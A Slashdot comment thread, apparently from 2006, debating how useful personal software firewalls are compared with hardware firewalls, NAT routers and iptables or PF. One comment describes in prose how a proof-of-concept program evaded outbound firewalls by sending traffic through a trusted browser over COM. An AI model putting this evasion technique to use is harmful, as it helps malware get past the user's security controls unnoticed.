      "Suppose I submit a firewall for testing that consists of a screening router with a default set of rules that block all traffic except outgoing WWW?"

      "and can't do it on a per-program basis"

      What you are referring to is an application-level firewall. Software or personal firewalls are no substitute for embedded standalone solutions, as when the user's personal system is compromised, all bets are off.
      --
      davecb5620@gmail.com
  25. well, duh by Anonymous Coward · · Score: 0

    But that's not why I use a personal firewall. I use a personal firewall to prevent "non-malicious" software from phoning home, running automatic updates, checking licenses and all that other crap which might inconvenience me if it happens at the wrong point in time. To keep nasties out I have a hardware firewall.

  26. Common Sense? by kingsean · · Score: 0

    I always get questions, especially from my college friends, about what AntiVirus software and Firewall I use on my Windows machines. And to be honest, it stuns me to see them stunned when I tell them I use neither. This BSI Agency pretty much summed it up in the middle of the article:

    "Desktop firewalls, as they are also called, are practically extraneous, presuming that you adhere to the basic rules of safe surfing," ... "Surfing habits are hence important for security,"

    Granted, "safe surfing" changes from household to household, but people who are using the internet should at the very least have the slightest idea on what they should be clicking on. All of the browsers today come defaulted to spit out warnings whenever someone is clicking on, say, an EXE file. Of the general users I've seen surfing, these warnings are normally defaulted to the 'x' button which is entirely "unsafe surfing."

    I do, however, have my router set up to block outgoing traffic to certain domains as well as connection types that I know my family will never use. Upon request, I go out to friend's and neighbor's houses to set that kind of stuff up for them, because having to walk them through it would be hell, much less trying to explain what I was doing. Firewalls and AntiVirus software aren't exactly very user-friendly; people would rather install them and expect them to work rather than read through heavy material and configure them to fit what they need.

    1. Re:Common Sense? by justthinkit · · Score: 1

      Ok, you are the unofficial Slashdot Pied Piper of 2006 for not using an A/V or firewall but before we all rush off the cliff with you, perhaps you can explain how you determine that the file you _want_ to download is not infected with something you don't want? Yes, you have outbound stuff covered with your router but you make no mention of any inbound filtering other than your apparently perfect intuition.

      [Those cursed with less than perfect cranium/ESP combinations [or children] should continue to use AVG anti-virus or equivalent, along with XP's free firewall.]

      --
      I come here for the love
    2. Re:Common Sense? by Anonymous Coward · · Score: 0

      A few things no-one seems to have mentioned yet:
      Vista will apparently include "2-way" firewalling. As "good??" as existing XP 1-way. Hmm...
      Well MS are MS right ?
      More importantly, on external routers most people seem to be making the assumption that the external router via NAT is a secure box. There are well-known vulnerabilities for several "home-based" routers. You can't treat them as "black boxes" and forget about 'em.
      They run software - right ?
      In a basic config relying on an external router and turning off firewalling (of whatever variety) on internal boxes is just plain asking for trouble !

    3. Re:Common Sense? by kingsean · · Score: 0

      Not once, anywhere in my comment did I say that I had perfect intuition, nor did I say that a system with no AntiVirus and Firewall is the perfect setup for all the computer mice of the world. It also might be worth mentioning that I am very rarely on a Windows desktop.

      Perhaps, though, I was a bit misleading and for that I should apologize. I merely meant to comment that software based Firewalls are ridiculously overhyped as mentioned in the article and a common solution to an oversecure system is merely to watch what you download... plain and simple. Firewalls should be left for the hardware to work with or a computer that is solely dedicated to that function.

      But since you seem to take this personally, if it makes you feel any better my old man's laptop uses Panda and the general family computer runs Norton.

      Sean

  27. No kidding... I've found them useless in practice by RebornData · · Score: 3, Informative

    The issue with most desktop software firewalls that attempt to control outbound connections is that they have no idea in advance what constitutes a valid program and what doesn't. So they ask the user, who in most cases is unable to answer the question. The only information typically provided is the executable name, and in many cases it's a generic one (like svchost.exe) that leaves even an experienced user without the ability to make an informed decision.

    The problem is that this trains users to ignore the prompts and habitually click "allow" or "deny" (usually because they find out the hard way that stuff breaks when they click "deny"). The result is far worse than if there were no attempts to control outbound access, because most of these firewalls (Zonealarm in particular) use similar techniques for *inbound* traffic too... they will prompt the user when a program opens a listening port, and if they hit "allow" will enable global inbound traffic to that port, creating a hole that otherwise wouldn't have been there.

    This happens regularly in practice - I've seen it over and over again with my small business consulting clients. Although technically an outbound software firewall with program control could be a good last-ditch effort to block malware that has managed to get installed and running, on a practical basis they cause more problems than they solve.

    -R

  28. Link to "printable" version of stories! by Anonymous Coward · · Score: 0

    Use the "printable" version of stories when it's available! That link from the slashdot summary made my eyes burn because I didn't have that site adblocked.

    FYI: http://www.mg.co.za/printPage.aspx?area=/insight/insight_tech/&articleId=275381

    It's not that difficult to do!

  29. Duh by The+MAZZTer · · Score: 1

    Once malware is running on your PC you should assume it can do ANYTHING it wants, including disabling firewalls/antivirus, etc.

    Heck, Windows Firewall has an API to allow programs to add themselves as exceptions (probably because if it didn't programmers would just use 100 different non-forward compatible methods to do it).

  30. How about configuring the software first? by brunokummel · · Score: 2, Insightful

    I haven't found it in TFA, but then again I read it in a rush because my boss was in the room, but I guess they performed the test the way most regular users use a personal firewall.
    This means press install, press next, next, next, next, OK, and done: I have my own personal protection!
    If you take the time to tune the software firewall, I'm pretty sure you would have much better results.

    --
    What is best in life? To crush your enemies, to see them driven before you and to hear the lamentations of their women.
  31. It lasted a whole 10 minutes? by Moraelin · · Score: 2, Interesting

    I still remember the lone time I got virused, as it also was the lone time when I put a non-firewalled machine on the internet.

    Basically the story is that I had managed to fry my home machine, didn't have a second computer at the time, but hey, looks like I got enough older parts for one (or a couple of them.) Stupidly enough, the firewall program (Sygate was my favourite at the time) was among the few things I had never backed up, but otherwise I could have a computer to play with in an hour or so.

    Now I could have, of course, gone and bought some security program, or could have downloaded it at work and burned it on a CD, or whatever. I chose to just do a sacrificial install instead. As in, you know, install Windows, go online unprotected long enough to download a firewall, reformat, reinstall Windows. I fully expected the first install to get virused, but that's ok, since it would get reformatted a few minutes later.

    It also was Windows 2000, not XP, so no activation hassle.

    Well... let's just say that what I didn't expect was how fast the thing got virused. I expected it to get virused eventually, yes, but it got owned within a couple of minutes. Scary.

    --
    A polar bear is a cartesian bear after a coordinate transform.
    1. Re:It lasted a whole 10 minutes? by julesh · · Score: 1

      I still remember the lone time I got virused, as it also was the lone time when I put a non-firewalled machine on the internet.

      You were probably unlucky. In the days before MSBLAST, a friend of mine was running his laptop unknowingly without a firewall, connecting to the internet daily. On the day MSBLAST was released, he got it. Realising his mistake, he brought the laptop to me, so I could perform a forensic inspection: MSBLAST was the *only* thing on the machine that shouldn't have been.

      Of course there are a few more nasties out there today, but I wouldn't be surprised to hear that a WinXP SP2 machine with no additional patches could survive for a few days at least.

  32. Old article by keithchau · · Score: 1

    Hey, the article was oooold, dated "25 June 2006". If it were some great discovery, we should probably have come across it much sooner.

  33. And spam filters are not 100% effective... by jbarr · · Score: 1

    ...and anti-virus scanners are not 100% effective. Given the continual cat-and-mouse game played by the white hats and the black hats, short of removing a PC completely from a network, there's little to completely, 100% guarantee security.

    That said, many of the software personal firewalls ARE actually quite good. The people using them just need to understand the potential ramifications. Education of basic Internet security combined with good Web browsing and file handling practices can go a whole lot farther than blindly relying on a single product.

    -Jim Barr
    http://jimstips.com/

    --
    My mom always said, "Jim, you're 1 in a million." Given the current population, there are 7000 of me. God help us all!
  34. Software Vs. Hardware by Drakin020 · · Score: 1, Interesting

    I think the problem here is Software vs. Hardware firewalls.

    Compare a Cisco PIX 501 to Norton's latest and greatest software firewall.
    A software firewall basically starts off blocking what it thinks are potential viruses or threats to your computer.
    A hardware firewall such as a PIX 501 just blocks everything until you tell it otherwise.
    A software firewall basically is a nuisance with all its little security warnings: "CAUTION: You're getting on the internet".
    A hardware firewall just stays out of the way and does only what it's told to do.

    The biggest difference between the two is the fact that software is so much easier to bypass than a hardware firewall. Software only blocks what comes into your computer, whereas the hardware is there right when traffic passes your modem.

    Also you get what you pay for... a PIX 501 runs around 400-500, whereas Norton with Anti-Virus is what... 50 bucks? You basically get what you pay for and can't expect much more.

    --
    The greatest revenge in life is massive success.
    1. Re:Software Vs. Hardware by Anonymous Coward · · Score: 0

      It's been a bit, but I thought the PIX 501 by default lets all out, denies all in. But also you can configure it to your heart's content and monitor it if you want. Also it has protocol inspection in the fixup commands. Unfriendly apps trying to use default open ports don't work with the PIX: the SMTP fixup opens port 25, but checks the commands running through it and gives fake responses to anything other than basic SMTP commands.

      Yes, you get what you pay for.
       
      I have absolutely no desire to even see one of these desktop firewalls ever again; the resources drained from your PC to provide the minimal protection aren't worth it to me. Great for my mom though. But if I want to prevent apps from launching, Windows has a built-in policy editor that allows you to configure policies that have obvious names like "only run allowed apps", way better than trying to get a 3rd party app to do the same thing you can already do in Windows for free. Plus, for all the Windows users with default settings out there, if you take 5 minutes to create a user and not admin account, then use that to browse the web, then malicious software can't be installed even if you wanted to, unless it's an actual security hole in the software. It's a hell of a lot more simple to do than to keep configuring app inspection in your desktop firewall, and it provides better security.

  35. ZoneAlarm + broadband router = happiness by WidescreenFreak · · Score: 5, Insightful

    Even though I'm behind a firewall, I use ZoneAlarm on all of my PCs so that I can catch what's communicating with the Internet and what's not. So far, it's done superbly well as far as I can tell.

    For example, every time I play a media file in Windows Media Player, it tries to connect to the Internet not once but twice - once when Media Player fires up and once again after it's finished! Excuse me? Exactly what is Media Player trying to figure out? Well, whatever it is, it's none of their damned business. Check "Remember this setting", click "Deny", and done.

    Every time a process tries to act like a server, ZA also notifies me of that as well. It's a bit of a pain when I fire up a game server for the first time and the pop-up balloon interferes with the screen (whoops), but again it just shows that it's at least doing what it's supposed to do.

    ZoneAlarm has its share of issues, but it clearly goes with the attitude of "better safe than sorry". There have been some rare times where the program itself doesn't start, for whatever reason, but its service gets started. On those rare occasions I've noticed that the service, if it can't communicate with the control daemon, or whatever you want to call it, just blocks all network access. It could have just allowed everything instead and there'd be no way of knowing if it's working or not. Personally, I'd rather have it block all access. Not only does that let me know that there's a problem, but it's certainly keeping the PC's network connection secure.

    Using a hardware firewall for inbound and ZA for outbound connections makes perfect sense as far as I'm concerned. It's not trouble-free, but its stability has been getting better over the past several revisions from what I can tell.

    --
    The Overrated mod is for reversing inappropriate, positive mods, not for voicing disagreement with a post.
    1. Re:ZoneAlarm + broadband router = happiness by squoozer · · Score: 1

      Media player is probably either doing some sort of licence check or an ID3 tag look up (or both).

      --
      I used to have a better sig but it broke.
    2. Re:ZoneAlarm + broadband router = happiness by brunascle · · Score: 1

      I agree. ZA may not be totally secure, but it does give me a lot of info about what's going on at that moment; info that I might not know until much later, or I might never know.

      For example: after I installed the nVidia drivers for my new card, ZA notified me that Apache was running and trying to accept connections. Apache? Excuse me, Apache? Don't get me wrong, Apache's great, but there's no way in hell I'm letting you install a web server on my PC without my permission. I promptly shut down the service (which was located in a sub-folder of the nVidia folder) and uninstalled the optional ForceWare package, which I believe was the culprit.

    3. Re:ZoneAlarm + broadband router = happiness by birder · · Score: 1

      Well, I agree. Setting up tests in which your system is already compromised seems pointless. Now, ZoneAlarm is only as good as the person using it. I have a router that blocks inbound and use ZoneAlarm for outgoing. It has stopped everything going out that doesn't need to. I couldn't imagine running Windows without it.

    4. Re:ZoneAlarm + broadband router = happiness by Tim+C · · Score: 1

      For example, every time I play a media file in Windows Media Player, it tries to connect to the Internet not once but twice - once when Media Player fires up and once again after it's finished! Excuse me? Exactly what is Media Player trying to figure out?

      Depending on your settings, it's probably opening a connection to the server to retrieve media info from (on startup) and reporting anonymous* usage data (on shut down). Both of these things can be switched off in the options settings. I don't guarantee that this will stop it phoning home completely, however, as I long since did as you did and blocked it.

    5. Re:ZoneAlarm + broadband router = happiness by ucblockhead · · Score: 1
      For example, every time I play a media file in Windows Media Player, it tries to connect to the Internet not once but twice - once when Media Player fires up and once again after it's finished!

      Most likely: At the start of the song, it's grabbing song metadata from a server, and reporting back that you played the song (probably with the "you" just being a "private" id, not anything user-identifiable; whether that's truly private is an open question). When the song finishes, it's probably reporting whether you listened to the complete song or not. They likely do this because play information is valuable for building a recommendation engine, and for selling to the record companies as marketing information.

      Most music players do this, but they usually ask permission on install and there's usually a setting to turn it off.

      --
      The cake is a pie
  36. Virtual firewalls on virtual machines by plankrwf · · Score: 2, Informative

    Some of the problems with 'virtual firewalls' can be solved through real firewalls on ... virtual machines (i.e. Sieve at http://sievefirewall.sourceforge.net/ or at http://www.vmware.com/vmtn/appliances/directory/245)

  37. Software Tested & Results???? by Anonymous Coward · · Score: 1, Informative

    Sorry to say that this article was about as useful as a RubberBand Band. Now if they'd identified the tested apps along with the version of Windows, I'd be more willing to even consider the article to be informative, but no, they make so many claims about personal software firewalls not being effective in some cases. What cases, and what worms/trojans/malware was able to bypass them, or what firewalls were able to be bypassed?

    Now I was one of the original beta testers for Zone Alarm and while it isn't perfect by any means, it's still about the only useful one I've seen and I continue using it today and recommending it as being fairly effective at what it does. It's at least better than the joke MS includes called Windows Firewall, which doesn't even have any outbound control unlike ZoneAlarm, which is what I mainly use it for. And no, I'm not a Windows user, as I'm currently running KDE-3.5.2 on Gentoo with 2.6.17 vanilla-series kernel (default tree); instead it's to ease the load I have in supporting the other computers in the household that still run Windows as yet.

  38. If I want to block all outbound traffic by Perl-Pusher · · Score: 1
    I could always disconnect! That is the #1 problem with personal firewalls. If your computer is making connections you don't want, your problem is not the ability to make a connection. It's the program that is making those connections. If you have a problem with spyware / malware, do us all a favor and disconnect. A firewall is meant to be between your PC and the Internet, not on your PC. Personal firewalls aren't really firewalls; they are more like patches in a pool or tank, an attempt to fix something broken and leaking. Which makes them more personal annoyances than firewalls. They should just block incoming SYN traffic trying to initiate a connection, only.

    The worst offender in my experience is Norton Internet Security. It blocks everything: browser, mail, MS Update, everything! Your computer just locks up for 30 sec - 3 minutes and then the goddamn little Symantec pop up appears!


    "Warning! Your computer is trying to make a connection to the internet, this is an unsafe act. Please press OK to reboot"

  39. bullshit by Anonymous Coward · · Score: 0

    I have one holding open my bedroom door (for kitty) and it works great!

  40. [OT] Re:Link to "printable" version of stories! by Ma�djeurtam · · Score: 4, Interesting

    If slashdot, digg and friends were to link to printable versions, how long would it take for those sites either to remove the print version or to put their ads there?

    --
    Instant Karma's gonna get you, Gonna knock you right on the head (John Lennon, 1970)
    1. Re:[OT] Re:Link to "printable" version of stories! by Anonymous Coward · · Score: 0

      It would benefit us in the meantime to link to printable stories.

      Currently, nobody links to them, so we see the pages with ads anyway.

      If we link to printable stories now, at least we could have a month or two of easy reading before they go back to putting ads on the printable pages, which would be no different than the stories linked today.

    2. Re:[OT] Re:Link to "printable" version of stories! by jmarkantes · · Score: 2, Interesting

      They should be doing things right by using a different media ("print") in their CSS. That way they could display ads on the screen, and when people print it's still formatted correctly.

      Regular users wouldn't be able to just click the print link to bypass ads, and advanced users could display on screen the print style sheet.

      J

  41. Winpooch by jhfry · · Score: 3, Informative

    This is why I run winpooch http://winpooch.free.fr/. It's not a firewall, but it does allow me to monitor my outgoing connections, and apply rules to them. For example, I can have it prompt me for every outbound, just announce when an outbound connection is established, or allow all outbound. Same thing with inbound. More complex rule sets are allowed as well.

    It's not gonna save me from a worm itself, but it will tell me when I have a worm or rootkit making outbound connections.

    And it allows me to use ClamWin to do on-access scanning, tells me whenever an application tries to change the registry or system files, and provides a simple method to determine most of the potentially damaging processes running on my machine.

    Best of all it's open source.

    --
    Sometimes the best solution is to stop wasting time looking for an easy solution.
  42. A firewall is a *device* by Curmudgeonlyoldbloke · · Score: 4, Insightful

    And where do you insert this "device" between your PC and the wireless router in the coffee shop or hotel room in which you're sitting? Wave it around in mid-air or something?

    Besides that, the most useful purpose of these things isn't against trojans that someone's running because they're an idiot, it's software such as media players insisting on phoning home (for example, the "Microsoft Windows Media Configuration Utility" connection attempt that occurs when WM9 tries to update itself).

    1. Re:A firewall is a *device* by Anonymous Coward · · Score: 0

      I tried out the AOL antivirus that slashdot was talking about a few weeks ago. Zone Alarm lit up every fucking time I booted the machine, asking if it was OK for my antivirus to access the internet (well, maybe it was updating its list) then wanting to act as a server!

      Why in the hell should an antivirus act as a server?

      It was uninstalled pretty quickly. ZoneAlarm did its job. TFA is full of shit.

    2. Re:A firewall is a *device* by swordfishBob · · Score: 1

      The same place my parents would put it. They have an ordinary modem. Same with my in-laws, except they couldn't have Cable or DSL if they wanted it.

      --
      -- All your bass are below two Hz
    3. Re:A firewall is a *device* by jez9999 · · Score: 1

      No, it's against hackers trying to connect to your system and exploit OS holes. My Sygate firewall is CONSTANTLY blocking hundreds of port probes to my IP address. At least, its logs say so. That's why I sort of laugh when I see reports that Microsoft's latest patch to an OS hole introduces an OS hole.

      I've probably been owned by a piece of malware or something instead, though.

  43. Bladder control problem too, eh? by Anonymous Coward · · Score: 0

    Do you have a bladder-control problem, too?

  44. I Agree! by SFSouthpaw · · Score: 1

    Whoever wrote that was a dick!

    --
    ---southpaw
  45. Marketing by Dachannien · · Score: 1

    The problem isn't that personal firewalls are useless. Rather, they are being marketed for a purpose they are not equipped to perform properly.

    I use a personal software firewall on all my Windows machines for two reasons: one, to prevent worms and such from getting a foothold on my machine, and two, to prevent phoning home of "non-malicious" software that has no real reason to be connecting out. I've run a bunch of programs over the years that attempt to connect to some remote machine for some unknown purpose and were subsequently caught by the firewall. None of these programs have been malware per se, but the outward connection is something that I nevertheless wish to prevent. In order to prevent actual malware from connecting outward, I am very careful about what I download and run.

    In fact, the only time that I've been nailed with malware in recent history was once when I hadn't installed a personal firewall and I VPN'ed through my hardware NAT router, thus exposing my machine to the full ill-will of teh Intarweb.

  46. security expectations for basic home NAT? by Anonymous Coward · · Score: 0

    Your comment makes me wonder how much security I have in a simple home network setup that consists of the following (outside-in viewpoint...):

    - SBC DSL home service (not fixed IP)
    - DSL device
    - old Netgear 4-port home router with DSL ethernet interface + 4 internal routed ports, providing basic NAT services to the home net and PPPoE auth to the DSL CO
    - internally, Windoze PCs not running any kind of inbound/outbound FW software.

    So what's the risk level w/crackers and script kiddies being able to somehow traverse the NAT router setup to access my home net PCs?

    1. Re:security expectations for basic home NAT? by SuperMog2002 · · Score: 1

      If you don't have any ports forwarded or DMZ enabled, pretty much nil. You should be good. Now, that setup will grant you no protection whatsoever from a stupid user who winds up with malware, but that's a whole different can of worms.

      --
      Sunwalker Dezco for Warchief in 2016
  47. Weakest Link... by jhembruff · · Score: 1

    A chain is only as strong as its weakest link. That's doubly true when it comes to protecting computers that are connected to the internet.

    Yes, and that's generally the thing between the chair and the keyboard, not your firewall. Obviously a personal software firewall can't be perfect, but they do a pretty good job of protecting you from inbound traffic (hell, even the XP SP2 firewall does a decent enough job of this; try connecting an unpatched, unfirewalled XP machine directly to the internet and see how long it takes). The best they can do for outbound is provide you with information about it and you can confirm/deny; unfortunately most people just click yes to everything. And if a computer has been compromised already and is trying to send outbound info, it was most likely the fault of the person who installed it without knowing what it is.

    Also, the article fails to mention which firewalls were tested, or how, but they get on the right track at the end when they talk about malware being at its root a problem that requires a social solution, not just a technological one (though hopefully not having everyday users run as admin 24/7 in vista will help, if only slightly).

  48. Personal firewalls quite useful by MobyDisk · · Score: 2, Interesting

    There are ways around personal firewalls, therefore personal firewalls are useless.

    So says an article linked by an article linked by an article that I can't really read. Pardon me if I am not convinced.

    I'm quite content with the personal firewall I have. It stops lots of outbound connections from applications that like to phone home. If there is an app on my system that searches for IE windows and uses them to surreptitiously send data out -- I'm already f*d. Fortunately, my firewall blocks IE so I'm not vulnerable to that one. (It could use Firefox though).

  49. All of them? by Penguinisto · · Score: 1
    ...guess they didn't test iptables or ipfilter (shrug).

    /P

    --
    Quo usque tandem abutere, Nimbus, patientia nostra?
    1. Re:All of them? by Deoxyribose · · Score: 1

      What differences are there in the effectiveness of ipfilter/iptables-based Linux firewalls as compared to Windows software firewalls (i.e. Zonealarm et al)? If anyone has anything illuminating on this topic I would be interested to hear it. I've been using Firestarter for a while now on my Ubuntu box, and have been wondering if I'm missing out on some of the more sophisticated or subtle features of iptables.

    2. Re:All of them? by Penguinisto · · Score: 1
      The beauty of iptables (Linux) or ipfilter (does pretty much the same thing on BSD, Solaris, and others) is the fact that by default, only root sets the parameters. That way, a malicious proggie, which would normally be running under normal user permissions, cannot mangle the firewall settings (so long as the perms on the conf files or the firewall binary aren't monkeyed with by the admin of the box).

      Windows OTOH lets ordinary users bang around with the 'personal firewall' settings, even turning the thing off outright. Vista may change this (one would hope), but I wouldn't hold my breath.

      iptables is a lot more subtle and flexible IMHO (e.g. it can control NAT routings), but Firestarter (if it isn't just a front-end for iptables anyway - not sure) should work okay for you as well, so long as only root can change the settings and turn it on/off.

      /P

      --
      Quo usque tandem abutere, Nimbus, patientia nostra?
  50. Biggest problem with personal firewalls by totallygeek · · Score: 3, Interesting

    Okay, we are talking about Windows users: they will simply click 'Yes' to anything that pops up on the screen.

    1. Re:Biggest problem with personal firewalls by Geminii · · Score: 1

      So why not make a virus which asks "Permanently kill your internet connection? [Yes] [No]" and let the problem take care of itself?

  51. Better than nothing by embracethenerdwithin · · Score: 4, Insightful
    I never assumed my software firewall was some amazing thing that kept me 100% safe. But I would still never want to surf without one. I don't care if it only protects against some attacks, it's definitely better than none. I would rather be protected from a little than nothing.

    My view has always been that using a combination of things that help is the best idea. Using a router that has a hardware firewall + a software firewall + antivirus + a secure browser (Firefox) is a decent way to keep safe. This won't stop everything, but it's better than surfing around with no protection. Also add not doing stupid things to that equation for maximum protection.

    1. Re:Better than nothing by embracethenerdwithin · · Score: 2, Interesting
      I forgot to mention using Ad-Aware or something like it. That's also very helpful.

      And if you don't want to use a firewall or anti virus, please come to my college and connect to the network. Wait 10 minutes while your computer gets owned.

      Within 1 hour of moving into my apartment on campus, Zone alarm has logged almost 1,000 inbound access attempts...now that's scary.

  52. More proof... by blueZhift · · Score: 1

    Meh, this is just more proof that PCs are just too hard for the average person to use. There's no way the typical user can easily follow the suggestions in the article. If anyone ever comes up with a good appliance-like device that does the things most people want to do online without worrying about viruses and trojans, the PC will be dead. I think that this complexity is leading into an era of coexistence for the home user wherein they resign themselves to sharing the computer with malware until it becomes unusable. Then they call for their favorite helpful neighbor geek, or just buy a new computer and start over again.

  53. This article is useless by classified · · Score: 1

    The cited article fails to either list the tested firewall software, list the tests performed, or even link to some place where that information is available. It is a statement of the obvious, well known facts that: (i) some software fails to perform even its designed function, and (ii) correctly designed software is often misconfigured to the point where it cannot perform as designed.

    The article further makes suggested solutions we have heard a thousand times, nothing new.

    To meaningfully talk about security on the average Joe's winbox, the focus has to come off average Joe and be placed on the OS software companies, and on laws and rules (at least in the US) that utterly fail to require any software publisher to be responsible for either designing securable software, or providing adequate notice of the risks associated with installing or using software (or a website). Of course, malware and greyware writers will not follow those requirements ... but if average Joe wanders down some dark internet alley without a condom on, it's his own fault, whereas when average Joe is going to a regular business site or using regular business software, the onus really should be on the publisher to disclose fully the risk, and to provide some tools to allow the user to understand what is going out.

    With respect to malware that attaches without user intervention, IMO, all outbound traffic ought to be opt in, not opt out by default on OS install, and turning that off ought to be as hard as cancelling AOL (i.e. next to impossible).

    I don't have a sig line, sorry.

    1. Re:This article is useless by atomic-penguin · · Score: 1

      While I agree with the premise that most personal firewalls are crap, like most personal firewall products, this article was useless.

      --
      /^([Ss]ame [Bb]at (time, |channel.)){2}$/
  54. Simple Solution - Live CD's, OK next problem... by ScrewTivo · · Score: 1

    I'm so tired of this I blogged it a while ago
    http://millionfirefoxconverts.blogspot.com/

  55. Trivial to Bypass by ThinkFr33ly · · Score: 3, Interesting

    I always get a kick out of people who set their firewall to prompt on every attempt to access the net, especially when they're running as admin on their boxes.

    Even without the user running as admin, it's fairly easy to create a program to bypass outgoing firewalls. Basically the trick is to piggyback your communications over an existing application that's trusted.

    Nearly everybody is going to trust IE (or Firefox, or whatever browser) to access the network. All you have to do is figure out a way to use that program to do your communications for you.

    I once wrote a proof of concept app (in VB no less!) that used IE to do exactly this. I set up a simple piece of server software that accepted requests via HTTP GETs and returned the response as base64 encoded text in an HTML body. When my app needed to access remote data I just used IE to request that data from the server and then base64 decoded it. I could have also done something like have the server software act as a proxy so I could request any remote data I wanted, even if it wasn't hosted by my server. It was trivial.

    The best part was that *every* major outgoing firewall failed to detect this attempt, despite the fact that they claim to be able to tell when one application is using another to piggyback communications. Perhaps it was the way the COM interface worked, I'm not sure... but it never failed and never prompted me to allow it to happen.

    1. Re:Trivial to Bypass by giuntag · · Score: 0

      That's why I never set ZoneAlarm to let IE to the internet:
      - use FF only as everyday web browser
      - when doing windows update or visiting the occasional borked site, 'allow IE for this time only'

      Of course you could script other tools like wget or curl to get to the web, but not many people would set those to 'always trusted', unless they are also used by some commercial app used on a daily basis.

      This is a moot point anyway, since I fully agree with the opinion expressed many times above, that Joe User has no clue at all about what to let through and what to forbid, when the question pops up.
      ZA for example gives only the exe file name, which is a very poor hint, but even adding full directory, timestamp, exe version and such would not be of any help, let alone be dependable.

    2. Re:Trivial to Bypass by ThinkFr33ly · · Score: 1

      Firefox is just as vulnerable to this technique as IE, although it takes a little more work to get the interop working.

  56. Re:IP Tables by mpapet · · Score: 4, Informative

    Linux has IP Tables which is very good for the job. Is it as good as BSD? I would argue less time consuming if you already run Linux, but it's not the same.

    Notes: I believe for stateful packet inspection, the kernel needs ip_conntrack and a few other things in it. Most distro kernels have this but it's worth double checking. From there, it's learning the IP tables syntax which isn't hard after going through one of the many examples out there. Once you get logging going, check out intrusion prevention systems!

    http://www.google.com/search?hs=3PG&hl=en&lr=&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=iptables&btnG=Search

    --
    http://www.maxineudall.com/2010/02/should-economists-be-sued-for-malpractice.html
  57. BSD firewall tutorial (was Re:misleading headline) by badger.foo · · Score: 5, Informative
    The manuscript at http://www.bgnett.no/~peter/pf/ is for a half day tutorial in setting up OpenBSD's PF firewall (also available on FreeBSD, NetBSD and DragonFlyBSD).

    The response I get (yes, I'm the guy who wrote the tutorial) is that people find it quite useful.

    The fact that it includes a few tips on how to give spammers a hard time helps too I guess.

    --
    -- That grumpy BSD guy - http://bsdly.blogspot.com/
  58. In my experience software firewalls are invaluable by brokeninside · · Score: 2, Interesting

    Of course, they aren't perfect. But I've got a friend who was having recurring problems with various malware. I set her up with Zone Alarm, Anti-Vir, Ad Aware and advised her to download Firefox to browse with rather than using IE. Without Zone Alarm to block the malware traffic while Anti-Vir downloaded updates to its signature files, her internet connection was saturated with so much malware traffic that she couldn't connect to anything else. Further, she gets to see what programs try to access the internet.

  59. Someone needs to beat this guy with a clue stick by wizkid · · Score: 0, Troll


    Personal firewalls are more to protect from inbound attacks. Not to restrict outbound traffic. Yes, it also helps to inform you what programs $M wants to let out. When I build a XP system and put it on the net to put $M patches on it, if I don't have a personal firewall, it will be own'ed before I can finish patching. That seems like a useful thing to me.

    DON'T LISTEN TO THIS MORON!!!

    --
    I take no responsibility for what I say. Even though I'm never wrong :)
  60. Re:You Mean Windows == Secure? by mpapet · · Score: 1

    I think the problem here is Software vs. Hardware firewalls.

    No, that's not the problem. The problem is you've chosen to ignore the fundamental flaw of Windows.

    Windows 3.1, 95, 98, 2000, XP (Longwait??) were never designed to run securely. BSD/*nix's are, from the kernel up. Are they invincible? No, but no OS is. Are they meaningfully better? Yes, very much so.

    Now, if you still insist on believing the problem is not your OS.
    1. Not one of my home customers would pay for a firewall what they paid for their PC!
    2. A pix is not a magic bullet. It's good at its job, but the windows desktop is still very vulnerable. (activex anyone?)

    Please, for your own benefit look at the facts with a little more objectivity.

    --
    http://www.maxineudall.com/2010/02/should-economists-be-sued-for-malpractice.html
  61. ISP's hate firewalls by phorm · · Score: 3, Interesting

    I love how, whenever I go to my grandparents to fix their computer (after they've dealt with their ISP's tech support) the ethernet cable is always running straight to the PC and bypassing the router. It's hard enough to get average Joe to understand the usefulness of a hardware routing/firewall device, but when the ISP is actively having them bypass it I can see a software firewall being somewhat useful at times.

  62. PFs cause misidentification of counterfeit SW? by Brad+Eleven · · Score: 1

    Remember the Microsoft Advantage flap earlier this year? I do. I have a copy of WinXP Pro, paid for, registered, all i's dotted and t's crossed.

    Then I get the "you may be the victim of counterfeiting" or somesuch. What????? Oh, my, was I angry. How dare they? I think I actually posted some ALL-CAPS message to M$, insisting that I was holding the receipt.

    Now I've just remembered that the machine also features the free version of AG firewall, and how I was very miserly in allowing services to "access the Internet". M$ services, in particular. Like I don't even get the pictures in the left pane of the Search dialogue.

    So I turned off the firewall and clicked the hazy grey little star in the taskbar, you know, the thing you get after you tell it to shut up about your counterfeit version of Windows.

    Of course I got right to the "congratulations" page. Then I got a lovely invitation to download some very helpful M$ software.

    So I turned the firewall back on.
    --
    "I want more life, father." ~Roy Batty

    --
    "Press to test."
    (click)
    "Release to detonate."
  63. Re:You Mean Windows == Secure? by nogginthenog · · Score: 1

    Windows NT upwards (including 2000 & XP) was designed to run securely and has all the security features of Unixes. Windows 9x wasn't.

  64. OpenWrt by Anonymous Coward · · Score: 0

    most ppl already have a dedicated firewall machine.

    1. Re:OpenWrt by jank1887 · · Score: 1

      ummmm.... no. most people follow the most absolutely basic instructions they receive from Verizon/SBC/Comcast/RoadRunner/InsertOtherNameHere and hook their modem directly to their primary PC. they might have a software firewall, assuming they've been upgraded to SP2 by a knowledgeable friend or WinUpdate. Most people just assume it's normal for their PC to get really slow after a couple months of use, and may have learned to do a reinstall by themselves. Or, there's the Geek Squad (or equivalent).

  65. Not to be trusted. by kahrytan · · Score: 1

    who is M&G? I never heard of such magazine so I don't trust them.

    With that said, I have actually considered upgrading to Netgear Prosafe Wired Router.

    --
    \
  66. Portable Travel Routers by joneshenry · · Score: 1

    Looking at product manuals for portable travel routers, I see lots of claims about "stateful packet inspection firewalls" and "NAT", but these only apply when the router is being used to share an Internet connection with the ethernet port connected not to one's laptop but to say a hotel's room connection.

    Is there any of these products that does the following: I plug my laptop into the router's ethernet port, I am able to configure the router through its web interface, the router connects to a wireless access point, the router then functions as a router for my laptop providing hardware firewall services?

  67. Incomplete is not always "useless" by Beryllium+Sphere(tm) · · Score: 2, Insightful

    An incomplete defense is useless in a chess game because your opponent will attack via the hole you left and you'll lose. If you're defending against ego-driven attackers or attackers who target you personally then it's appropriate to try for a security posture with no holes in it.

    Mass-produced malware is usually not built for pride of workmanship. It is commercial software built to make money and is not a fraction better than it needs to be.

